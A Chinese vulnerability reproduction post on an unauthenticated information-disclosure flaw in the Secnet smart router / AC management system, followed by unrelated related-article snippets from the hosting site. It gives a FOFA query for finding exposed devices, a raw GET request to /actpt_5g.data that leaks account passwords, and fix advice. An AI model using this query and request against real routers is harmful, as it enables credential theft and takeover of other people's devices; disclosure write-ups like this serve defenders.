Secnet-智能路由系统 actpt_5g.data 信息泄露漏洞复现

0x01 产品简介

Secnet安网智能AC管理系统是广州安网通信技术有限公司(简称“安网通信”)的无线AP管理系统。

0x02 漏洞概述

Secnet-智能路由系统 actpt_5g.data 接口存在信息泄露漏洞,未经身份验证的远程攻击者可以利用此漏洞获取系统账户名密码等重要凭据,导致系统后台权限失控,处于极不安全状态。

0x03 影响范围

version <= 1.02.042

0x04 复现环境

FOFA:

title="安网-智能路由系统" || title=="智能路由系统" || title="安网科技-智能路由系统" || title="智能AC管理系统"

0x05 漏洞复现

PoC

GET /actpt_5g.data HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Connection: close

读取账号密码信息 

登录后台

0x06 修复建议

删除该接口页面或增加访问控制

升级至安全版本 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/10057.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

【JVM基础篇】JVM入门介绍

JVM入门介绍 为什么学习JVM 岗位要求 解决工作中遇到的问题 性能调优 真实案例 导出超大文件&#xff0c;系统崩溃从数据库中查询超大量数据出错消费者消费来不及导致系统崩溃Mq消息队列接受消息导致的内存泄漏业务高峰期系统失去响应 初识JVM 什么是JVM&#xff1f; JV…

C 语言中怎么产生真正的随机数?

在C语言中&#xff0c;要产生真正的随机数&#xff0c;我们通常使用标准库中的 <stdlib.h> 头文件中提供的随机数生成函数。 这些函数可以生成伪随机数&#xff0c;但它们在一定程度上是随机的&#xff0c;足以满足大多数应用程序的需求。 1. 伪随机数生成函数 C标准库…

Vue + Vite + Axios 项目多环境以及部署前后端跨域

最近在前端多环境和部署服务器之后出现的跨域的问题。 多环境 前端多环境 Vite Axios 1.首先在项目目录下定义多环境的文件。 这里列举开发环境和发布环境 .env.development 环境 # 开发时加载// 此处为开发时接口 VITE_API_URL http://localhost:8080/api.env producti…

软考 系统架构设计师系列知识点之软件架构风格(11)

接前一篇文章&#xff1a;软考 系统架构设计师系列知识点之软件架构风格&#xff08;10&#xff09; 所属章节&#xff1a; 第7章. 系统架构设计基础知识 第3节. 软件架构风格 相关试题 9. “编译器”是一种非常重要的基础软件&#xff0c;其核心功能是对源代码形态的单个或一…

【c++】string深度刨析以及实现

#pragma once #include<iostream> using namespace std; #include<assert.h> namespace bite {class string{public://迭代器 //像指针 底层不一定是指针 typedef char* iterator;iterator begin(){return _str;}iterator end(){return _str _size;}//const 版本…

网络端口占用问题的综合调研与解决方案

原创 Randy 拍码场 问题背景 去年底信息安全团队进行网络权限治理&#xff0c;要求所有应用实例使用静态IP&#xff0c;公网访问策略与静态IP绑定&#xff1b;之后实例重启时偶现“端口被占用”错误。通过分析总结应用日志&#xff0c;共有以下4种错误类型&#xff0c;实质都是…

kafka生产者消费者举例

文章目录 kafka介绍生产者消费者例子一、生产者二、消费者三、效果 KafkaTemplate KafkaListener kafka介绍 Kafka 是一款分布式流处理平台&#xff0c;它被设计用于高吞吐量、持久性、分布式的数据流处理。 Kafka 简介&#xff1a; Kafka 是一个高吞吐、分布式、基于发布 订阅…

Emmy load workspace 排除一些目录

项目根目录新增 emmy.config.json { “source”: [ { “dir”: “./”, “exclude”: [ “Assets/Script/LuaScript/Config/.lua", "Share/DNS/Android/common/.lua”, “Assets/Script/LuaScript/UI/Team/Views/**.lua” ] } ] }

深入了解 Flask Request

文章目录 获取请求数据获取请求信息文件上传总结 Flask 是一个轻量级的 Python Web 框架&#xff0c;其简洁的设计和灵活的扩展性使其成为了许多开发者的首选。在 Flask 中&#xff0c;处理 HTTP 请求是至关重要的&#xff0c;而 Flask 提供了丰富而强大的 request 对象来处理…

根据地址栏url上key获取值

vue项目&#xff0c;main.js: // 根据url上key获取值&#xff0c;key为参数名字&#xff0c;例如token export function sessionIdFunc(key){ const urlSessionId new URLSearchParams(window.location.hash.slice(window.location.hash.indexOf(?))); const paramSessionI…

安装InternVL

InternVL 官网 interVL 安装 完全删除环境和环境中的所有软件包 conda remove -n env_name --all 安装 克隆此存储库&#xff1a; git clone https://github.com/OpenGVLab/InternVL.git 创建conda虚拟环境并激活&#xff1a; conda create -n inter pytho…

SpringAop详解

文章目录 一、Spring自定义注解1、什么是注解&#x1f468;‍&#x1f3eb;2、注解的目的或作用&#x1f49e;3、JDK内置注解&#x1f4ab; 【内置元注解 一共八个固定注解】4、元注解 &#x1f3af;5、自定义注解&#x1f4f8;5、Java反射API和类加载过程51、什么是反射基本原…

前端:零宽字符

1. 概念 看不见得字符&#xff0c;称为零宽字符&#xff0c;也叫幽灵字符。 2. 作用 保护我们文章得知识产权。加文字水印&#xff0c;不影响阅读。 3. unicode 零宽字符 U200B: 空格符&#xff0c;用于较长单词得换行分隔。 U200C: 断字符&#xff0c;用于阿拉伯文、德文…

GT资源-Clock资源

一、Transmitter 时钟分布 XCLK&#xff1a;在使用TX buffer的模式下&#xff0c;XCLK来源于TXOUTCLK。在使用TX bypassing的模式下XCLK来源于TXUSERCLK。TXUSRCLK是GTX/GTH中PCS的内部逻辑时钟。TXUSRCLK2是GT Transceiver 用户侧逻辑时钟。 TXUSRCLK与TXUSRCLK2的关系 FPGA …

Python面试题【数据结构和算法部分161-200】

Python面试题【数据结构和算法部分161-200】 Python面试题【数据结构和算法部分161-200】 Python面试题【数据结构和算法部分161-200】 问题&#xff1a;如何在Python中找到最近公共祖先&#xff08;LCA&#xff09;&#xff1f; 答案&#xff1a; class TreeNode:def __init_…

ECharts系列文章汇总(持续更新中)

ECharts介绍 ECharts是一款基于JavaScript的数据可视化图表库&#xff0c;提供了直观、生动、可交互、可个性化定制的数据可视化图表。以下是关于ECharts的详细介绍&#xff1a; 发展历程&#xff1a; ECharts最初由百度团队开源&#xff0c;并在2018年初捐赠给Apache基金会&…

解决PL/SQL中文乱码??????

三部解决pl/sql中文乱码问题 一、查询数据库字符集 语句&#xff1a;select userenv(language) from dual 二、设置环境变量 操作&#xff1a;计算机->属性->高级系统设置->环境变量->新建环境变量名NLS_LANG&#xff0c;值是第一步查询结果。 三、重启PL/SQL&a…

【C++阅览室】C++之Vector(容器)

目录 vector的介绍 vector的使用 vector的定义 vector iterator 的使用 vector 空间增长问题 vector 增删查改 vector 迭代器失效问题。&#xff08;重点&#xff09; vector的介绍 1、 vector 是表示可变大小数组的序列容器&#xff0c;可以使用连…